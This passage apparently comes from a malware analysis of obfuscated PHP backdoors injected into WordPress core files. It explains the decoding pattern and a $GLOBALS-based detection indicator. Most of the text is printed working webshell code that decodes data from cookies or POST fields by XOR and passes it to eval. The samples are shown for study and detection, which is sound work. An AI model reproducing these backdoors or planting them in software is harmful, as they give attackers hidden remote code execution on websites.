$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]] = $kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]] = 
$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = $kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2];$kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]] = $kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][43];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] = $_POST;$kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] = $_COOKIE;@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60], 
NULL);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47], 0);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50], 0);@$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]](0);$u63f1 = NULL;$p39bec = NULL;$kf0800b21[$kf0800b21['e7ad307'][20].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][10]] = 
$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64];global $w9af8;function a862($u63f1, $b7d73df){global $kf0800b21;$l669cad = "";for ($l7574d672=0; $l7574d672<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1);){for ($p596=0; $p596<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($b7d73df) && $l7574d672<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1); $p596++, $l7574d672++){$l669cad .= 
$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]]($kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($u63f1[$l7574d672]) ^ $kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($b7d73df[$p596]));}}return $l669cad;}function t94afa4($u63f1, $b7d73df){global $kf0800b21;global $w9af8;return $kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($u63f1, $w9af8), $b7d73df);}foreach ($kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] as $b7d73df=>$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}if (!$u63f1){foreach ($kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] as $b7d73df=>$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}}$u63f1 = @$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]]($kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]]($u63f1), $p39bec));if 
(isset($u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]) && $w9af8==$u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]){if ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][51]){$l7574d672 = Array($kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48] => @$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]](),$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][48] => $kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][71].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][77],);echo @$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($l7574d672);}elseif ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][50]){eval/*c4033*/($u63f1[$kf0800b21['e7ad307'][64]]);}exit();} ?>
Most often they are injected into WordPress core files (wp-includes/, wp-admin/ or the root of the site). The structure is nearly always the same: a long dictionary string, function names rebuilt character by character from it, a loop over $_COOKIE and $_POST to retrieve the payload, an XOR decode, then eval():
<?php $a078e82 = 840;$GLOBALS['v048a'] = Array();global $v048a;$v048a = $GLOBALS;${"GLOBALS"}['e7a5745b2'] = "3A^neQ8D*Kl+=gOf]v9!P.ITV&W2J,|Y#x9i5rwM4 s:C~;?ESxdu`a[%z1U}yLq(@HBFmdGN'x0xaX{<"7oc$_h)Zb-/>pjR6tk";$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][82].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][36];$v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][68];$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]] = $v048a['e7a5745b2'][34].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]] = 
$v048a['e7a5745b2'][92].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]] = $v048a['e7a5745b2'][50].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]] = $v048a['e7a5745b2'][88].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]] = 
$v048a['e7a5745b2'][13].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][27];$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]] = $v048a['e7a5745b2'][73].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][82];$v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] = $_POST;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] = $_COOKIE;@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13], NULL);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41], 
0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][67].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4], 0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]](0);$x24294 = NULL;$r73534bfb = NULL;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][6]] = $v048a['e7a5745b2'][6].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][0];global $sbb18;function x9b72fc($x24294, $h23d86){global $v048a;$q3dd887f = "";for ($v3970=0; $v3970<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294);){for ($n33fd565=0; 
$n33fd565<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($h23d86) && $v3970<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294); $n33fd565++, $v3970++){$q3dd887f .= $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]]($v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($x24294[$v3970]) ^ $v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($h23d86[$n33fd565]));}}return $q3dd887f;}function gbc192($x24294, $h23d86){global $v048a;global $sbb18;return $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($x24294, $sbb18), $h23d86);}foreach ($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] as $h23d86=>$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}if (!$x24294){foreach ($v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] as $h23d86=>$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}}$x24294 = 
@$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]]($v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]]($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]]($x24294), $r73534bfb));if (isset($x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]) && $sbb18==$x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]){if ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][34]){$v3970 = Array($v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17] => @$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]](),$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][17] => $v048a['e7a5745b2'][56].$v048a['e7a5745b2'][21].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56],);echo @$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]]($v3970);}elseif ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][4]){eval/*ifd841*/($x24294[$v048a['e7a5745b2'][68]]);}exit();} ?>
A simpler variant rebuilds the code from (offset, length) pairs cut out of a carrier string with substr():
<?php $p5dQxlL = array(8660, 185, 6556, 64, 6770, 183, 2842, 158, 5462, 182, 13540, 186, 7538, 178, 12903, 122, 11598, 108, 6269, 89, 4100, 161, 682, 102, 6077, 41, 1022, 153, 4629, 88, 5818, 109, 6953, 183, 1771, 114, 11125, 97, 3000, 42, 9736, 187, 3761, 164, 12707, 196, 847, 114, 4355, 153, 1175, 129, 7136, 93, 6192, 77, 3290, 176, 5124, 151, 8045, 179, 2671, 74, 12185, 176, 8224, 73, 467, 69, 92, 190, 8845, 187, 536, 146, 10796, 149, 10945, 81, 10271, 155, 13195, 177, 7229, 121, 8297, 173, 9165, 164, 1885, 93, 7350, 188, 12137, 48, 11463, 135, 3925, 175, 784, 63, 13025, 170, 4828, 55, 12530, 77, 4508, 121, 11917, 56, 2156, 122, 9923, 160, 1647, 124, 4717, 111, 5275, 187, 10694, 102, 2278, 191, 5927, 150, 12075, 62, 12027, 48, 0, 92, 9519, 158, 4261, 94, 11026, 99, 6118, 74, 7716, 194, 10524, 170, 13372, 168, 10143, 41, 4883, 146, 11706, 74, 3466, 146, 2469, 123, 1304, 154, 11222, 125, 11347, 116, 9474, 45, 5644, 174, 6667, 103, 8470, 190, 282, 185, 10083, 60, 3170, 120, 2745, 97, 3042, 128, 11973, 54, 2592, 79, 5029, 95, 961, 61, 9677, 59, 6358, 198, 9329, 145, 1588, 59, 11780, 137, 13726, 158, 12607, 100, 3612, 149, 1458, 130, 10184, 87, 9032, 133, 7952, 93, 10426, 98, 1978, 178, 6620, 47, 12361, 169, 7910, 42); $FY52xy = ""; for ($tWqBxTpk = 0;$tWqBxTpk < sizeof($p5dQxlL);$tWqBxTpk+= 2) { if ($tWqBxTpk % 4) { $FY52xy.= substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]); } else { $FY52xy.= $jaNwcmT(substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1])); } }; if (!isset($jcRQ6i)) return $FY52xy;
You will notice that this family of malware relies on the $GLOBALS superglobal (it is not a function: the script copies $GLOBALS into a short variable and uses that array as a dictionary of function names). That is the indicator we use most often:
<?php $tb78 = 506; $GLOBALS['fb355e'] = Array(); global $fb355e; $fb355e = $GLOBALS; $ { "GLOBALS" } ['l82418'] = "ozMBYu4A<"TnPRx ~ I ^ bk_O5 & HU\x9JW } > w$\xa ? /; Nm, GyVj0F[ = 1q % Dl9) de@]c782\ : (6f\xdv + #KsZS|p'-!gaXL3E*Cr`.{tQhi";$fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]] = $fb355e['l82418'][60].$fb355e['l82418'][96].$fb355e['l82418'][90];$fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]] = $fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][56];$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]] = 